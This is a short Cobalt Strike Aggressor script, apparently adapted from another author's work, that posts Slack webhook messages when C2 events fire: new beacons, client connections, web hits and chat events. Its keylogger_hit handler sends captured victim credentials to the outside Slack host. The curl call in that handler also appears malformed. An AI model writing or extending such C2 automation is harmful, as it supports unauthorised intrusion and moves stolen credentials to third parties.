# Based on the work of @ bluescreenofjeff

$slack_channel = "#XXXXXX";
$slack_emoji = ':skeleton:';
$slack_webhookURL = 'https://hooks.slack.com/services/XXXXXXXXXXX/XXXXXXXXXXXXXx';

$teamserver_hostname = 'XXXXXX';


on beacon_initial {
		@curl_command = @('curl','-X','POST','--data-urlencode','payload={"username": "Cobalt Strike Bot", "icon_emoji": "' . $slack_emoji. '", "channel": "' . $slack_channel . '", "text":"New Beacon on ' . $teamserver_hostname . '. GameOn!"}',$slack_webhookURL);
		exec(@curl_command);
}


on ready {
		@curl_command = @('curl','-X','POST','--data-urlencode','payload={"username": "Cobalt Strike Bot", "icon_emoji": "' . $slack_emoji. '", "channel": "' . $slack_channel . '", "text":"CS Client Connected"}',$slack_webhookURL);
		exec(@curl_command);
}



on web_hit {
		@curl_command = @('curl','-X','POST','--data-urlencode','payload={"username": "Cobalt Strike Bot", "icon_emoji": "' . $slack_emoji. '", "channel": "' . $slack_channel . '", "text":"Web hit from ' . $3 . '. for ' . $2 .'"}',$slack_webhookURL);
		exec(@curl_command);
}

on disconnect {
		@curl_command = @('curl','-X','POST','--data-urlencode','payload={"username": "Cobalt Strike Bot", "icon_emoji": "' . $slack_emoji. '", "channel": "' . $slack_channel . '", "text":"CS Client Disconnected"}',$slack_webhookURL);
		exec(@curl_command);
}


on event_public {
		@curl_command = @('curl','-X','POST','--data-urlencode','payload={"username": "Cobalt Strike Bot", "icon_emoji": "' . $slack_emoji. '", "channel": "' . $slack_channel . '", "text":" ' . $1 . ' posted: ' . $2 .'"}',$slack_webhookURL);
		exec(@curl_command);
}


on keylogger_hit {

		@curl_command = @('curl','-X','POST','payload={"username": "Cobalt Strike Bot", "icon_emoji": "' . $slack_emoji. '", "channel": "' . $slack_channel . '", "text":"Creds from ' . $1 . '. : ' . $3 .'"}',$slack_webhookURL);
		exec(@curl_command);



}


